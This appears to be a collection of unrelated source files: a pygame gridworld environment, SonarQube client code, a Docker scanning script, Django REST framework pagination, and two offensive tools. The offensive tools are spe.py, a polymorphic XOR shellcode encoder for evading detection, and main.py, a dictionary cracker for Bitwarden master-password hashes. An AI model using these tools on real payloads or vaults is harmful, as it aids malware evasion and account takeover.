self.rows = copy.deepcopy(self.original_row)
self.window_size, self.screen = self.set_window()
self.objects = []
hero = gameOb(self.newPosition(), None, 'hero', BLUE)
self.objects.append(hero)
for _ in range(2):
goal = gameOb(self.newPosition(), 3, 'goal', GREEN)
self.objects.append(goal)
for _ in range(5):
holes = gameOb(self.newPosition(), -1, 'fire', RED)
self.objects.append(holes)
return self.renderEnv()
def newPosition(self):
points = []
for row in range(1, self.rows+1):
for column in range(1, self.rows+1):
points.append((self.size_margin * row + self.size_square * (row - 1),
self.size_margin * column + self.size_square * (column - 1)))
currentPositions = []
for objectA in self.objects:
if (objectA.x, objectA.y) not in currentPositions:
currentPositions.append((objectA.x, objectA.y))
for pos in currentPositions:
points.remove(pos)
location = np.random.choice(range(len(points)), replace=False)
return points[location]
def renderEnv(self):
self.screen.fill(BLACK)
for row in range(self.rows):
for column in range(self.rows):
pygame.draw.rect(self.screen, WHITE,
[(self.size_margin + self.size_square) * column + self.size_margin,
(self.size_margin + self.size_square) * row + self.size_margin,
self.size_square, self.size_square])
for block in self.objects:
if block.name == 'hero':
pygame.draw.rect(self.screen, block.color, pygame.Rect(
block.x, block.y, self.size_square, self.size_square))
else:
pygame.draw.rect(self.screen, block.color, pygame.Rect(
block.x, block.y, self.size_square, self.size_square))
pygame.surfarray.array3d(pygame.display.get_surface())
pygame.display.flip()
imgdata = pygame.surfarray.array3d(self.screen)
# imgdata.swapaxes(0,1)
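# note: scipy.misc.imresize was removed in SciPy 1.3.0, so the calls below assume
# scipy<1.3 (skimage.transform.resize or PIL would be the modern replacements)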
b = scipy.misc.imresize(
imgdata[:, :, 0], [84, 84, 1], interp='nearest')
c = scipy.misc.imresize(
imgdata[:, :, 1], [84, 84, 1], interp='nearest')
d = scipy.misc.imresize(
imgdata[:, :, 2], [84, 84, 1], interp='nearest')
img = np.stack([b, c, d], axis=2)
return img
def updateStart(self, x, y):
hero = None
for block in self.objects:
if block.name == 'hero':
hero = block
break
hero.x += x
hero.y += y
score = 0
if hero.x >= self.window_size or hero.y >= self.window_size or hero.x <= 0 or hero.y <= 0:
score = -1
if score != 0:
hero.x -= x
hero.y -= y
for i in range(len(self.objects)):
if self.objects[i].name == 'hero':
self.objects[i] = hero
break
return score
def checkGoal(self):
hero = None
for block in self.objects:
if block.name == 'hero':
hero = block
break
for other in self.objects:
if other.name != 'hero' and hero.x == other.x and hero.y == other.y:
# self.objects.remove(other)
# if other.name == 'goal':
# self.objects.append(gameOb(self.newPosition(), 3, 'goal', GREEN))
# # self.objects.append(gameOb(self.newPosition(), 1, 'goal', GREEN))
# # n = int(len([i for i in self.objects if i.reward == -1])*0.2)
# # n = 1 if n < 1 else n
# # self.rows += int(1/n)
# # self.window_size, self.screen = self.set_window()
# # self.objects.extend([gameOb(self.newPosition(), -1, 'fire', RED) for i in range(n)])
# else:
# self.objects.append(gameOb(self.newPosition(), -1, 'fire', RED))
return other.reward
return -0.1 # penalty of a move
def move(self, action):
pygame.event.pump()
if (action == 0): # up
score = self.updateStart(0, -self.size_margin - self.size_square)
elif (action == 1): # right
score = self.updateStart(self.size_margin + self.size_square, 0)
elif (action == 2): # down
score = self.updateStart(0, self.size_margin + self.size_square)
elif (action == 3): # left
score = self.updateStart(-self.size_margin - self.size_square, 0)
elif (action == 4): # up-right
score = self.updateStart(self.size_margin + self.size_square, -self.size_margin - self.size_square)
elif (action == 5): # right-down
score = self.updateStart(self.size_margin + self.size_square, self.size_margin + self.size_square)
elif (action == 6): # down-left
score = self.updateStart(-self.size_margin - self.size_square, self.size_margin + self.size_square)
elif (action == 7): # left-up
score = self.updateStart(-self.size_margin - self.size_square,-self.size_margin - self.size_square)
pygame.surfarray.array3d(pygame.display.get_surface())
pygame.display.flip()
return score
def step(self, action):
penalty = self.move(action)
reward = self.checkGoal()
state = self.renderEnv()
return state, (reward + penalty)
``` |
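A throwaway random-agent loop to exercise the environment above (assumes the Map class from this file; running it opens a pygame window):
```python
import numpy as np

env = Map(rows=8)
state = env.reset()                      # 84x84x3 uint8 observation
for step in range(25):
    action = np.random.randint(env.actions)
    state, reward = env.step(action)
    if reward > 0:
        print(f"step {step}: reached a goal, reward {reward}")
```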
{
"source": "0x5FC3/spe.py",
"score": 2
} |
#### File: 0x5FC3/spe.py/spe.py
```python
from keystone import *
import random
REGISTERS = list()
# Registers with 8 bit parts
REGISTERS.append({32: "EAX", 16: "AH", 8: "AL"})
REGISTERS.append({32: "EBX", 16: "BH", 8: "BL"})
REGISTERS.append({32: "ECX", 16: "CX", 8: "CL"})
REGISTERS.append({32: "EDX", 16: "DX", 8: "DL"})
# Registers without 8 bit parts
REGISTERS.append({32: "ESI", 16: "SI"})
REGISTERS.append({32: "EDI", 16: "DI"})
def read_payload(path):
"""Read file as bytes"""
with open(path, 'rb') as f:
return f.read()
def assemble(code):
"""Assemble instructions"""
ks = Ks(KS_ARCH_X86, KS_MODE_32)
encoding, count = ks.asm(code)
return bytes(encoding)
def get_random_fpu_instruction():
"""Returns a random FPU instruction.
Ported to python from metasploit's shikata_ga_nai.rb
"""
fpu_opcodes = list()
# D9E8 - D9 EE
for opcode in range(0xe8, 0xee+1):
fpu_opcodes.append(bytes([0xd9, opcode]))
# D9C0 - D9CF
for opcode in range(0xc0, 0xcf+1):
fpu_opcodes.append(bytes([0xd9, opcode]))
# DAC0 - DADF
for opcode in range(0xc0, 0xdf+1):
fpu_opcodes.append(bytes([0xda, opcode]))
# DBC0 - DBDF
for opcode in range(0xc0, 0xdf+1):
fpu_opcodes.append(bytes([0xdb, opcode]))
# DDC0 - DDC7
for opcode in range(0xc0, 0xc7+1):
fpu_opcodes.append(bytes([0xdd, opcode]))
fpu_opcodes.append(bytes([0xd9, 0xd0]))
fpu_opcodes.append(bytes([0xd9, 0xe1]))
fpu_opcodes.append(bytes([0xd9, 0xf6]))
fpu_opcodes.append(bytes([0xd9, 0xf7]))
fpu_opcodes.append(bytes([0xd9, 0xe5]))
return random.choice(fpu_opcodes)
def get_offset(limit=12):
"""Returns a random offset for the fnstenv location"""
return random.randrange(0, limit)
def format_payload(payload):
# readability out of the window
return ''.join([f'\\x{payload[i:i+2]}' for i in range(0, len(payload), 2)])
def generate_random_byte():
return random.randrange(0x01, 0xFF)
def get_random_register(size=32, exclude_regs=[]):
"""Returns a random register with a given size
excluding the registers in the exclude_regs list
"""
reg = random.choice(REGISTERS)
if (size in reg):
for reg_value in reg.values():
if reg_value in exclude_regs:
return get_random_register(size, exclude_regs)
return reg.get(size)
return get_random_register(size, exclude_regs)
def generate_pops(target_reg, exclude_regs=[], count=1, allow_dups=True):
"""Returns pop instructions ending with pop target_reg
excluding registers in the exclude_regs list
"""
random_regs = []
for _ in range(0, count-1):
random_reg = get_random_register(exclude_regs=exclude_regs)
random_regs.append(random_reg)
pops = ''
for reg in random_regs:
pops += f'pop {reg}; '
pops += f'pop {target_reg}; '
return pops
def generate_decoder_stub(payload_len, key):
"""Returns the decoder stuff which decodes the
encoded payload.
"""
# Calculate the offset of encoded payload
# from the retrieved PC.
# FPU instruction + fnstenv = 2 + 4 bytes
offset_to_encoded_payload = 6
# Offset for fnstenv to write on the stack
# a little more polymorphism
fnstenv_offset = get_offset()
# instructions for the getPC routine
get_pc_asm = ''
# size 4 bytes
get_pc_asm += f'fnstenv [esp-{hex(fnstenv_offset)}]; '
# reg to save program counter
pc_reg = get_random_register(exclude_regs=['ECX'])
# if offset is 4 bytes aligned, use pops
# instead of mov
if (fnstenv_offset % 4 == 0):
instructions_count = int((12 - fnstenv_offset)/4) + 1
# size 1 byte each
offset_to_encoded_payload += (instructions_count*1)
get_pc_asm += generate_pops(pc_reg,
exclude_regs=['ECX'],
count=instructions_count)
else:
# else use mov
# size 4 bytes
offset_to_encoded_payload += 4
get_pc_asm += f'mov {pc_reg}, [esp+{hex(12-fnstenv_offset)}]; '
# register to save the one byte xor key
xor_key_reg = get_random_register(size=8, exclude_regs=['CL', pc_reg])
# xor decode instructions
xor_asm = ''
# if payload size can fit in one byte, use CL
if (payload_len < 256):
# size 2 bytes
offset_to_encoded_payload += 2
xor_asm += f'mov CL, {hex(payload_len)}; '
else:
# else use CX
# size 4 bytes
offset_to_encoded_payload += 4
xor_asm += f'mov CX, {hex(payload_len)}; '
# size of the next 4 instructions
offset_to_encoded_payload += 8
# size 2 bytes
xor_asm += f'mov {xor_key_reg}, {hex(key)}; '
xor_asm += 'decode: '
# size 4 bytes
# offset-1 because starts from 0
xor_asm += f'xor [{pc_reg} + CL + {hex(offset_to_encoded_payload-1)}], {xor_key_reg}; '
# size 2 bytes
xor_asm += f'loop decode; '
# assemble and return
decoder_stub = b''
decoder_stub += get_random_fpu_instruction()
decoder_stub += assemble(get_pc_asm)
decoder_stub += assemble(xor_asm)
return decoder_stub
def encode_payload(payload, key):
"""Returns XOR encoded payload with the given key"""
encoded_payload = b''
for b in payload:
encoded_payload += bytes([b ^ key])
return encoded_payload
def encode(payload_path):
payload = read_payload(payload_path)
key = generate_random_byte()
encoded_payload = encode_payload(payload, key)
decoder_stub = generate_decoder_stub(len(payload), key)
return decoder_stub + encoded_payload
print(format_payload(encode('./payload').hex()))
``` |
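Single-byte XOR is an involution, which is exactly what the emitted decoder stub relies on: applying the same key twice restores the original bytes. A quick standalone check (the payload bytes are arbitrary):
```python
payload = b"\x90\x90\x31\xc0\xcc"  # arbitrary bytes standing in for shellcode
key = 0x5f
encoded = bytes(b ^ key for b in payload)
decoded = bytes(b ^ key for b in encoded)
assert decoded == payload
print(encoded.hex())
```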
{
"source": "0x646e78/python-sonarqube-api",
"score": 3
} |
#### File: sonarqube/cloud/users.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_USERS_SEARCH_ENDPOINT,
API_USERS_GROUPS_ENDPOINT
)
class SonarCloudUsers(RestClient):
"""
SonarCloud users Operations
"""
MAX_SEARCH_NUM = 200
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarCloudUsers, self).__init__(**kwargs)
def __getitem__(self, login):
result = list(self.search_users(q=login))
for user in result:
if user['login'] == login:
return user
def search_users(self, q=None):
"""
Get a list of active users.
:param q: Filter on login, name and email
:return:
"""
params = {}
page_num = 1
page_size = 1
total = 2
if q:
params.update({'q': q})
while page_num * page_size < total:
resp = self.get(API_USERS_SEARCH_ENDPOINT, params=params)
response = resp.json()
page_num = response['paging']['pageIndex']
page_size = response['paging']['pageSize']
total = response['paging']['total']
params['p'] = page_num + 1
for user in response['users']:
yield user
if page_num >= self.MAX_SEARCH_NUM:
break
def search_groups_user_belongs_to(self, login, organization, q=None, selected="selected"):
"""
Lists the groups a user belongs to.
:param login:
:param organization: organization key.
:param q: Limit search to group names that contain the supplied string.
:param selected: Depending on the value, show only selected items (selected=selected), deselected items
(selected=deselected), or all items with their selection status (selected=all). Possible values are:
* all
* deselected
* selected
default value is selected.
:return:
"""
params = {
'login': login,
'organization': organization,
'selected': selected
}
if q:
params.update({'q': q})
page_num = 1
page_size = 1
total = 2
while page_num * page_size < total:
resp = self.get(API_USERS_GROUPS_ENDPOINT, params=params)
response = resp.json()
page_num = response['paging']['pageIndex']
page_size = response['paging']['pageSize']
total = response['paging']['total']
params['p'] = page_num + 1
for group in response['groups']:
yield group
```
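A hedged usage sketch for the paginated search above; the SonarCloudClient constructor and .users attribute follow this library's conventions, but the URL, token, and query are placeholders:
```python
from sonarqube import SonarCloudClient

sonar = SonarCloudClient(sonarcloud_url="https://sonarcloud.io", token="<token>")
# search_users is a generator that walks the paged API transparently
for user in sonar.users.search_users(q="alice"):
    print(user["login"], user.get("name"))
```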
#### File: sonarqube/community/measures.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_MEASURES_COMPONENT_ENDPOINT,
API_MEASURES_COMPONENT_TREE_ENDPOINT,
API_MEASURES_SEARCH_HISTORY_ENDPOINT
)
class SonarQubeMeasures(RestClient):
"""
SonarQube measures Operations
"""
default_metric_keys = 'code_smells,bugs,vulnerabilities,new_bugs,new_vulnerabilities,\
new_code_smells,coverage,new_coverage'
OPTIONS_COMPONENT_TREE = ['branch', 'pullRequest', 'additionalFields', 'asc', 'metricKeys', 'metricPeriodSort',
'metricSort', 'metricSortFilter', 'ps', 'q', 'qualifiers', 's', 'strategy']
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarQubeMeasures, self).__init__(**kwargs)
def get_component_with_specified_measures(self, component, branch=None, pull_request_id=None,
fields=None, metric_keys=None):
"""
Return component with specified measures.
:param component: Component key
:param branch: Branch key.
:param pull_request_id: Pull request id.
:param fields: Comma-separated list of additional fields that can be returned in the response.
Possible values are: metrics, periods
:param metric_keys: Comma-separated list of metric keys. Possible values are: ncloc, complexity, violations
:return:
"""
params = {
'metricKeys': metric_keys or self.default_metric_keys,
'component': component
}
if branch:
params.update({'branch': branch})
if pull_request_id:
params.update({'pullRequest': pull_request_id})
if fields:
params.update({'additionalFields': fields})
resp = self.get(API_MEASURES_COMPONENT_ENDPOINT, params=params)
return resp.json()
def get_component_tree_with_specified_measures(self, component_key, **kwargs):
"""
Navigate through components based on the chosen strategy with specified measures. The baseComponentId or
the component parameter must be provided.
:param component_key: Component key.
optional parameters:
* branch: Branch key.
* pullRequest: Pull request id.
* metricKeys: Comma-separated list of metric keys. Possible values are: ncloc, complexity, violations
* additionalFields: Comma-separated list of additional fields that can be returned in the response.
Possible values are: metrics, periods
* asc: Ascending sort. Possible values are: true, false, yes, no. Default value is true.
* metricPeriodSort: Sort measures by leak period or not? The 's' parameter must contain
the 'metricPeriod' value
* metricSort: Metric key to sort by. The 's' parameter must contain the 'metric' or 'metricPeriod' value.
It must be part of the 'metricKeys' parameter
* metricSortFilter: Filter components. Sort must be on a metric. Possible values are:
* all: return all components
* withMeasuresOnly: filter out components that do not have a measure on the sorted metric
default value is all.
* q: Limit search to:
* component names that contain the supplied string
* component keys that are exactly the same as the supplied string
* qualifiers:Comma-separated list of component qualifiers. Filter the results with
the specified qualifiers. Possible values are:
* BRC - Sub-projects
* DIR - Directories
* FIL - Files
* TRK - Projects
* UTS - Test Files
* s: Comma-separated list of sort fields. Possible values are: name, path, qualifier, metric, metricPeriod.
Default value is name.
* strategy: Strategy to search for base component descendants:
* children: return the children components of the base component. Grandchildren components are not returned
* all: return all the descendants components of the base component. Grandchildren are returned.
* leaves: return all the descendant components (files, in general) which don't have other children.
They are the leaves of the component tree.
default value is all.
:return:
"""
params = {
'component': component_key,
'metricKeys': self.default_metric_keys,
}
if kwargs:
self.api.copy_dict(params, kwargs, self.OPTIONS_COMPONENT_TREE)
page_num = 1
page_size = 1
total = 2
while page_num * page_size < total:
resp = self.get(API_MEASURES_COMPONENT_TREE_ENDPOINT, params=params)
response = resp.json()
page_num = response['paging']['pageIndex']
page_size = response['paging']['pageSize']
total = response['paging']['total']
params['p'] = page_num + 1
for component in response['components']:
yield component
def search_measures_history(self, component, branch=None, pull_request_id=None,
metrics=None, from_date=None, to_date=None):
"""
Search measures history of a component
:param component: Component key.
:param branch: Branch key.
:param pull_request_id: Pull request id.
:param metrics: Comma-separated list of metric keys. Possible values are: ncloc, coverage, new_violations
:param from_date: Filter measures created after the given date (inclusive).
Either a date (server timezone) or datetime can be provided
:param to_date: Filter measures created before the given date (inclusive).
Either a date (server timezone) or datetime can be provided
:return:
"""
params = {
'metrics': metrics or self.default_metric_keys,
'component': component
}
if branch:
params.update({'branch': branch})
if pull_request_id:
params.update({'pullRequest': pull_request_id})
if from_date:
params.update({'from': from_date})
if to_date:
params.update({'to': to_date})
page_num = 1
page_size = 1
total = 2
while page_num * page_size < total:
resp = self.get(API_MEASURES_SEARCH_HISTORY_ENDPOINT, params=params)
response = resp.json()
page_num = response['paging']['pageIndex']
page_size = response['paging']['pageSize']
total = response['paging']['total']
params['p'] = page_num + 1
for measure in response['measures']:
yield measure
```
#### File: sonarqube/community/plugins.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_PLUGINS_AVAILABLE_ENDPOINT,
API_PLUGINS_CANCEL_ALL_ENDPOINT,
API_PLUGINS_INSTALL_ENDPOINT,
API_PLUGINS_INSTALLED_ENDPOINT,
API_PLUGINS_PENDING_ENDPOINT,
API_PLUGINS_UNINSTALL_ENDPOINT,
API_PLUGINS_UPDATE_ENDPOINT,
API_PLUGINS_UPDATES_ENDPOINT
)
class SonarQubePlugins(RestClient):
"""
SonarQube plugins Operations
"""
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarQubePlugins, self).__init__(**kwargs)
def get_available_plugins(self):
"""
Get the list of all the plugins available for installation on the SonarQube instance, sorted by plugin name.
Plugin information is retrieved from Update Center. Date and time at which Update Center was last refreshed is
provided in the response. Update status values are:
* COMPATIBLE: plugin is compatible with current SonarQube instance.
* INCOMPATIBLE: plugin is not compatible with current SonarQube instance.
* REQUIRES_SYSTEM_UPGRADE: plugin requires SonarQube to be upgraded before being installed.
* DEPS_REQUIRE_SYSTEM_UPGRADE: at least one plugin on which the plugin is dependent requires SonarQube to
be upgraded.
:return:
"""
resp = self.get(API_PLUGINS_AVAILABLE_ENDPOINT)
response = resp.json()
return response['plugins']
def cancel_operation_pending_plugins(self):
"""
Cancels any operation pending on any plugin (install, update or uninstall)
:return:
"""
self.post(API_PLUGINS_CANCEL_ALL_ENDPOINT)
def install_plugin(self, plugin_key):
"""
Installs the latest version of a plugin specified by its key.
Plugin information is retrieved from Update Center.
:param plugin_key: The key identifying the plugin to install
:return:
"""
params = {
'key': plugin_key
}
self.post(API_PLUGINS_INSTALL_ENDPOINT, params=params)
def get_installed_plugins(self, fields=None):
"""
Get the list of all the plugins installed on the SonarQube instance, sorted by plugin name.
:param fields: Comma-separated list of the additional fields to be returned in response.
No additional field is returned by default. Possible values are:
* category - category as defined in the Update Center. A connection to the Update Center is needed
:return:
"""
params = {}
if fields:
params.update({'f': fields})
resp = self.get(API_PLUGINS_INSTALLED_ENDPOINT, params=params)
response = resp.json()
return response['plugins']
def get_pending_plugins(self):
"""
Get the list of plugins which will either be installed or removed at the next startup of the SonarQube instance,
sorted by plugin name.
:return:
"""
resp = self.get(API_PLUGINS_PENDING_ENDPOINT)
return resp.json()
def uninstall_plugin(self, plugin_key):
"""
Uninstalls the plugin specified by its key.
:param plugin_key: The key identifying the plugin to uninstall
:return:
"""
params = {
'key': plugin_key
}
self.post(API_PLUGINS_UNINSTALL_ENDPOINT, params=params)
def update_plugin(self, plugin_key):
"""
Updates a plugin specified by its key to the latest version compatible with the SonarQube instance.
Plugin information is retrieved from Update Center.
:param plugin_key: The key identifying the plugin to update
:return:
"""
params = {
'key': plugin_key
}
self.post(API_PLUGINS_UPDATE_ENDPOINT, params=params)
def get_available_update_plugins(self):
"""
Lists plugins installed on the SonarQube instance for which at least one newer version is available,
sorted by plugin name. Each newer version is listed, ordered from the oldest to the newest,
with its own update/compatibility status.Plugin information is retrieved from Update Center.
Date and time at which Update Center was last refreshed is provided in the response.
Update status values are: [COMPATIBLE, INCOMPATIBLE, REQUIRES_UPGRADE, DEPS_REQUIRE_UPGRADE].
:return:
"""
resp = self.get(API_PLUGINS_UPDATES_ENDPOINT)
return resp.json()
```
#### File: sonarqube/community/project_branches.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_PROJECT_BRANCHES_LIST_ENDPOINT,
API_PROJECT_BRANCHES_DELETE_ENDPOINT,
API_PROJECT_BRANCHES_RENAME_ENDPOINT
)
class SonarQubeProjectBranches(RestClient):
"""
SonarQube project branches Operations
"""
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarQubeProjectBranches, self).__init__(**kwargs)
def search_project_branches(self, project):
"""
List the branches of a project.
:param project: Project key
:return:
"""
params = {
'project': project
}
resp = self.get(API_PROJECT_BRANCHES_LIST_ENDPOINT, params=params)
response = resp.json()
return response['branches']
def delete_project_branch(self, project, branch):
"""
Delete a non-main branch of a project.
:param project: Project key
:param branch: Name of the branch
:return:
"""
params = {
'project': project,
'branch': branch
}
self.post(API_PROJECT_BRANCHES_DELETE_ENDPOINT, params=params)
def rename_project_branch(self, project, name):
"""
Rename the main branch of a project
:param project: Project key
:param name: New name of the main branch
:return:
"""
params = {
'project': project,
'name': name
}
self.post(API_PROJECT_BRANCHES_RENAME_ENDPOINT, params=params)
```
#### File: sonarqube/community/webservices.py
```python
from sonarqube.utils.rest_client import RestClient
from sonarqube.utils.config import (
API_WEBSERVICES_LIST_ENDPOINT,
API_WEBSERVICES_RESPONSE_EXAMPLE_ENDPOINT
)
class SonarQubeWebservices(RestClient):
"""
SonarQube webservices Operations
"""
def __init__(self, **kwargs):
"""
:param kwargs:
"""
super(SonarQubeWebservices, self).__init__(**kwargs)
def list_web_services(self, include_internals=False):
"""
List web services
:param include_internals: Include web services that are implemented for internal use only.
Their forward-compatibility is not assured. Possible values are: True or False. Default value is False.
:return:
"""
params = {
'include_internals': 'true' if include_internals else 'false'
}
resp = self.get(API_WEBSERVICES_LIST_ENDPOINT, params=params)
response = resp.json()
return response['webServices']
def web_service_response_example(self, action, controller):
"""
Display web service response example
:param action: Action of the web service
:param controller: Controller of the web service
:return:
"""
params = {
'action': action,
'controller': controller
}
return self.post(API_WEBSERVICES_RESPONSE_EXAMPLE_ENDPOINT, params=params)
``` |
{
"source": "0x646e78/sonarq",
"score": 2
} |
#### File: sonarq/sonarq/sonarq.py
```python
import argparse
import docker
import json
import os
import time
from datetime import datetime
from datetime import timezone
from sonarqube import SonarQubeClient
scanner_image='sonarsource/sonar-scanner-cli'
scanner_tag='latest'
server_image='sonarqube'
server_tag='lts'
server_name='sonar-server'
server_user='admin'
server_pass='<PASSWORD>' #Please don't bug me about this yet :P
docker_network='sonarq'
#TODO: logger
#TODO: __main__
class Infra():
def __init__(self):
self.client = docker.from_env()
def check_network(self):
try:
self.client.networks.get(docker_network)
except docker.errors.NotFound:
print(f'Creating docker network "{docker_network}" for SonarQube')
self.client.networks.create(docker_network)
def run_server(self):
try:
print('Launching a new SonarQube server')
container = self.client.containers.run(f'{server_image}:{server_tag}',
name=server_name,
network=docker_network,
ports={'9000/tcp': (host_ip, host_port)},
detach=True)
except Exception as e:
print(e)
exit(1)
return container
def run_scan(self, code_path, project_name, token):
try:
print(f'Starting a SonarQube scan of {project_name}. This could take a while depending on project size')
container = self.client.containers.run(f'{scanner_image}:{scanner_tag}',
f'-Dsonar.projectKey={project_name} -Dsonar.login={token} -Dsonar.working.directory=/tmp',
environment={'SONAR_HOST_URL': f'http://{server_name}:9000'},  # container port; host_port only applies on the host side
name='sonar-scanner',
network=docker_network,
volumes={code_path: {'bind': '/usr/src', 'mode': 'ro'}},
remove=True)
except Exception as e:
#TODO clean up container
print(e)
exit(1)
def server_status(self):
try:
return self.client.containers.get(server_name).status
except docker.errors.NotFound:
return False
def start_server(self):
print('Starting SonarQube server')
return self.client.containers.get(server_name).start()
def pull(self):
print('Updating docker images, this could take a while')
self.client.images.pull(server_image, tag=server_tag)
print('Server image pulled')
self.client.images.pull(scanner_image, tag=scanner_tag)
print('Scanner image pulled')
def stop(self):
print('Stopping SonarQube server')
return self.client.containers.get(server_name).stop()
def kill(self):
print('Removing SonarQube server')
return self.client.containers.get(server_name).remove(force=True)
#argparse TODO:
# scan even if not a git repo
# password for server
parser = argparse.ArgumentParser(description='Local sonarqube scanning.')
parser.add_argument('-n', '--project-name',
help='Project name to use in SonarQube, defaults to code folder name')
parser.add_argument('--ip', default='127.0.0.1',
help='Local host IP to bind to, defaults to 127.0.0.1.')
parser.add_argument('--port', default='9000',
help='Local host port to bind to, defaults to 9000.')
parser.add_argument('-p', '--pull', action='store_true',
help='Get the docker mages used by sonarq')
parser.add_argument('--stop-server', action='store_true',
help="Stop the server")
parser.add_argument('--kill-server', action='store_true',
help="Destroy the server")
parser.add_argument('path', nargs='?')
args = parser.parse_args()
infra = Infra()
if args.kill_server:
infra.kill()
exit(0)
if args.stop_server:
infra.stop()
exit(0)
if args.pull:
infra.pull()
exit(0)
if not args.path:
parser.error('Must specify a code path')
code_path = os.path.abspath(args.path)
if args.project_name:
project_name = args.project_name
else:
project_name = os.path.basename(os.path.normpath(code_path))
host_ip = args.ip
host_port = args.port
#TODO check code path exists and is a git repo
print(f'Beginning sonarq tasks for the path {code_path}')
#check docker network, create if non existent
infra.check_network()
#check server status, run or start if needed if not found
start_time = int(datetime.now(tz=timezone.utc).timestamp())
state = infra.server_status()
if state != 'running':
if not state:
container = infra.run_server()
time.sleep(20)
elif state == 'exited':
infra.start_server()
time.sleep(15)
container = infra.client.containers.get(server_name)
while True:
if infra.server_status() == 'running':
logs = str(container.logs(since=start_time))
if 'SonarQube is up' in logs:
break
else:
time.sleep(3)
#auth to server
s = SonarQubeClient(sonarqube_url=f'http://{host_ip}:{host_port}', username=server_user, password=server_pass)
print(f'SonarQube server is available at http://{host_ip}:{host_port}')
#Create a token
sonar_tokens = s.user_tokens.search_user_tokens(user_login=server_user)
for i in sonar_tokens:
if i['name'] == project_name:
s.user_tokens.revoke_user_token(project_name, user_login=server_user)
sonar_token = s.user_tokens.generate_user_token(project_name, user_login=server_user).json()['token']
#check if project exists in sonar, create if not
project = list(s.projects.search_projects(projects=project_name))
if len(project) < 1:
print(f'Creating a new SonarQube project named {project_name}')
project = s.projects.create_project(project=project_name, name=project_name, visibility='private')
else:
print(f'Using existing SonarQube project {project_name}')
project = project[0]
#run the scan
infra.run_scan(code_path, project_name, sonar_token)
#output the link to the project
print('Scan complete. Results are available at the following url (user/pass = admin/admin)')
print(f'\nhttp://{host_ip}:{host_port}/dashboard?id={project_name}\n')
#TODO: output the main stats
``` |
{
"source": "0x6470/poc_Bitwarden2Hashcat",
"score": 3
} |
#### File: 0x6470/poc_Bitwarden2Hashcat/main.py
```python
import hashlib
import json
import base64
def crack(email, keyHash, iterations, wordlist):
email = email.lower().encode() # make email lowercase and encode it to utf-8 (byte string)
wordlist = [i.rstrip("\n") for i in open(wordlist)] # convert wordlist to array
for passphrase in wordlist:
passphrase = passphrase.encode()
pepper = hashlib.pbkdf2_hmac("sha256", passphrase, email, iterations, None)
possibleKeyHash = hashlib.pbkdf2_hmac("sha256", pepper, passphrase, 1, None) # change from 1 to 2 for the new version
possibleKeyHash = base64.b64encode(possibleKeyHash).decode() # base64 encode possibleKeyHash and make it a regular string
if possibleKeyHash == keyHash:
return "Found password: {} : {}".format(keyHash, passphrase.decode())
def getData():
with open("data.json") as f: # some unnecessary entries were removed, retrieved from Windows 10 App, found in %userprofile%\AppData\Local\Packages\8bitSolutionsLLC.bitwardendesktop_h4e712dmw3xyy\LocalCache\Roaming\Bitwarden
data = json.load(f)
email = data["userEmail"] # 10minutemail.com
keyHash = data["keyHash"]
iterations = data["kdfIterations"]
return email, keyHash, iterations
print(crack(*getData(), "wordlist.txt"))
# correct password: <PASSWORD>
``` |
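The PoC works because the stored `keyHash` is a nested PBKDF2 derivation: the master key is PBKDF2-HMAC-SHA256(password, salt=email, N iterations), and the hash is one more PBKDF2 round of that key salted with the password (two rounds on newer clients, as the comment in `main.py` notes). A sketch of checking a single candidate, using only the standard library:

```python
import base64
import hashlib


def bitwarden_key_hash(password: bytes, email: bytes, iterations: int) -> str:
    """Derive the keyHash a Bitwarden client would store for one candidate."""
    # master key = PBKDF2-HMAC-SHA256(password, salt=lowercased email, N iterations)
    master_key = hashlib.pbkdf2_hmac("sha256", password, email.lower(), iterations)
    # keyHash = PBKDF2-HMAC-SHA256(master key, salt=password, 1 iteration)
    key_hash = hashlib.pbkdf2_hmac("sha256", master_key, password, 1)
    return base64.b64encode(key_hash).decode()
```

A candidate matches when `bitwarden_key_hash(candidate, email, iterations)` equals the `keyHash` value pulled from `data.json`.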
{
"source": "0x64746b/django-rest-framework",
"score": 3
} |
#### File: django-rest-framework/rest_framework/pagination.py
```python
from __future__ import unicode_literals
from rest_framework import serializers
from rest_framework.templatetags.rest_framework import replace_query_param
class NextPageField(serializers.Field):
"""
Field that returns a link to the next page in paginated results.
"""
page_field = 'page'
def to_native(self, value):
if not value.has_next():
return None
page = value.next_page_number()
request = self.context.get('request')
url = request and request.build_absolute_uri() or ''
return replace_query_param(url, self.page_field, page)
class PreviousPageField(serializers.Field):
"""
Field that returns a link to the previous page in paginated results.
"""
page_field = 'page'
def to_native(self, value):
if not value.has_previous():
return None
page = value.previous_page_number()
request = self.context.get('request')
url = request and request.build_absolute_uri() or ''
return replace_query_param(url, self.page_field, page)
class DefaultObjectSerializer(serializers.Field):
"""
If no object serializer is specified, then this serializer will be applied
as the default.
"""
def __init__(self, source=None, context=None):
# Note: Swallow context kwarg - only required for eg. ModelSerializer.
super(DefaultObjectSerializer, self).__init__(source=source)
class PaginationSerializerOptions(serializers.SerializerOptions):
"""
An object that stores the options that may be provided to a
pagination serializer by using the inner `Meta` class.
Accessible on the instance as `serializer.opts`.
"""
def __init__(self, meta):
super(PaginationSerializerOptions, self).__init__(meta)
self.object_serializer_class = getattr(meta, 'object_serializer_class',
DefaultObjectSerializer)
class BasePaginationSerializer(serializers.Serializer):
"""
A base class for pagination serializers to inherit from,
    to make implementing custom serializers easier.
"""
_options_class = PaginationSerializerOptions
results_field = 'results'
def __init__(self, *args, **kwargs):
"""
Override init to add in the object serializer field on-the-fly.
"""
super(BasePaginationSerializer, self).__init__(*args, **kwargs)
results_field = self.results_field
object_serializer = self.opts.object_serializer_class
if 'context' in kwargs:
context_kwarg = {'context': kwargs['context']}
else:
context_kwarg = {}
self.fields[results_field] = object_serializer(source='object_list', **context_kwarg)
class PaginationSerializer(BasePaginationSerializer):
"""
A default implementation of a pagination serializer.
"""
count = serializers.Field(source='paginator.count')
next = NextPageField(source='*')
previous = PreviousPageField(source='*')
```
